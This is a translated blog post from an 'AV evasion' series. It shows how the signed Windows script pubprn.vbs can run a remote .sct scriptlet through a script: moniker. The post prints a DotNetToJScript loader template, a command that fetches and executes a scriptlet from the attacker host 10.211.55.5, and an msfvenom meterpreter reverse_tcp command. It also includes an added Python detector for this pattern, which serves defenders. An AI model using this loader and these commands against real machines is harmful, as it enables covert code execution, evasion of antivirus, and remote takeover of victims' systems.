Remote Control AV Evasion Series (48): Whitelisted pubprn.vbs executing a payload

Posted on 2020-3-16 19:24:58
1. Introduction to pubprn.vbs

On Windows 7 and later there is a Microsoft-signed WSH script named PubPrn.vbs, located under C:\Windows\System32\Printing_Admin_Scripts\en-US. Looking at this particular script, it is clear that it accepts user-supplied input (via command-line arguments) and passes that argument straight to GetObject().

File location: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs

This means we can run the script and pass it the two arguments it expects. The first argument can be anything; the second is the payload, given via the script: moniker.

Note: if the value supplied for the first argument is not a network address (the script expects a ServerName), the /b switch can be added to cscript.exe when invoking it to suppress any additional error messages.
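Added detection example, not from the original post: Python logic that flags cscript/wscript launching pubprn.vbs with a script: moniker argument, the pattern described above, run over constructed Sysmon-style process-creation records (field names and sample values are assumed).

```python
import re

# Constructed Sysmon Event ID 1 style records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://10.211.55.5/msf.sct"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 SCRIPT:HTTPS://example.invalid/a.sct'},
    # Legitimate use: publishing a printer to Active Directory (LDAP target, no script: moniker).
    {"Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript.exe C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs printsrv01 LDAP://CN=Printers,DC=corp"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe script:http://10.211.55.5/msf.sct"},
]

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
PUBPRN_RE = re.compile(r"pubprn\.vbs", re.IGNORECASE)
# A standalone "script:" moniker token; the lookbehind avoids matching inside other words.
MONIKER_RE = re.compile(r"(?<![\w:])script:(?P<target>\S+)", re.IGNORECASE)


def classify_event(event):
    """Return a finding dict for a suspicious pubprn.vbs invocation, else None."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    if image not in SCRIPT_HOSTS or not PUBPRN_RE.search(cmd):
        return None
    m = MONIKER_RE.search(cmd)
    if not m:
        return None  # printer-publishing usage (e.g. LDAP:// target): no moniker present
    target = m.group("target").strip('"')
    # A remote scriptlet (HTTP(S) or UNC) is the highest-risk form; a local path is still unusual.
    remote = target.lower().startswith(("http://", "https://", "\\\\"))
    return {"severity": "high" if remote else "medium", "host": image, "target": target}


def scan(events):
    """Run classify_event over a batch of records and keep only the findings."""
    return [f for f in (classify_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```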
2. Executing a payload with pubprn.vbs

Lab environment:
Attacker: Kali 10.211.55.5
Victim: Win7 10.211.55.8

2.1 Running calc.exe via pubprn.vbs
Source of msf.sct (for how to generate a .sct file, see "Remote Control AV Evasion Series (39): Whitelisted Regsvr32.exe executing a payload (VT detection rate 18-58)"):
    <?xml version="1.0" encoding="utf-8"?>
    <package>
      <component
        id="dummy">
        <registration
          description="dummy"
          progid="dummy"
          version="1.00"
          remotable="True"></registration>
        <script
          language="JScript"><![CDATA[function setversion() {
    }
    function debug(s) {}
    // Decode a base64 string into a .NET MemoryStream using COM-visible .NET classes.
    function base64ToStream(b) {
            var enc = new ActiveXObject("System.Text.ASCIIEncoding");
            var length = enc.GetByteCount_2(b);
            var ba = enc.GetBytes_4(b);
            var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
            ba = transform.TransformFinalBlock(ba, 0, length);
            var ms = new ActiveXObject("System.IO.MemoryStream");
            ms.Write(ba, 0, (length / 4) * 3);
            ms.Position = 0;
            return ms;
    }

    // serialized_obj is the base64 of the BinaryFormatter-serialized .NET object graph
    // produced by DotNetToJScript; it embeds the compiled assembly.
    var entry_class = 'MSFWrapper.Program';

    try {
            setversion();
            var stm = base64ToStream(serialized_obj);
            // Deserialize the embedded object graph with BinaryFormatter.
            var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
            var al = new ActiveXObject('System.Collections.ArrayList');
            var d = fmt.Deserialize_2(stm);
            al.Add(undefined);
            // Invoking the deserialized delegate loads the assembly; CreateInstance runs the entry class.
            var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);

    } catch (e) {
        debug(e.message);
    }]]></script>
      </component>
    </package>

Place msf.sct in the web root of the Kali system.

On the Win7 system, run:

    C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:http://10.211.55.5/msf.sct

In the experiment, the Calculator application pops up.
2.2 Getting a reverse shell with pubprn.vbs
1. Generate C# shellcode with msfvenom on Kali

    msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f csharp -b "\x00\xff" LHOST=10.211.55.5 LPORT=4444 -o shell_x86.csharp
2. Build the sct file
Follow the sct build procedure from "Remote Control AV Evasion Series (39): Whitelisted Regsvr32.exe executing a payload (VT detection rate 18-58)"; the rough steps are:
(1) Create a C# Console project in VS 2017; .NET 2.0 is recommended for better compatibility. If you choose .NET 4.0, it may not run on machines that do not have 4.0 installed;
(2) Put the C# shellcode into the corresponding MsfPayload location;
(3) Compile to an exe file;
(4) Convert the exe into an sct script file.
Tool used: DotNetToJScript

    https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/DotNetToJScript.zip

3. Configure msf on Kali

4. Execute the payload with pubprn.vbs
Place the generated shellcode sct file in the Kali web root, then execute the sct file with pubprn.vbs on Win7.

    C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:http://10.211.55.5/shellxxx2.sct

But it never checked in...

5. After carefully re-reading "Remote Control AV Evasion Series (39): Whitelisted Regsvr32.exe executing a payload (VT detection rate 18-58)", I found that the header and footer of the sct file also need to be replaced. But even after replacing the header and footer, the payload still did not check in. I then tried using the sct file that executed calc.exe above to run the reverse-shell shellcode (i.e. putting the shellcode from my generated sct into msf.sct), which also did not work!
This is a failed case; I am recording it for now and will supplement it later~~~
After checking in, this process ends immediately.

3. Summary
pubprn.vbs can only be used for command execution and cannot return a host shell. Without AV installed, system commands can be run directly anyway and there is no need to use pubprn.vbs; with AV installed, using pubprn.vbs triggers a behavior alert from 360 Safeguard, and running a command such as adding a system user triggers both the 360 Safeguard behavior alert and an add-user alert.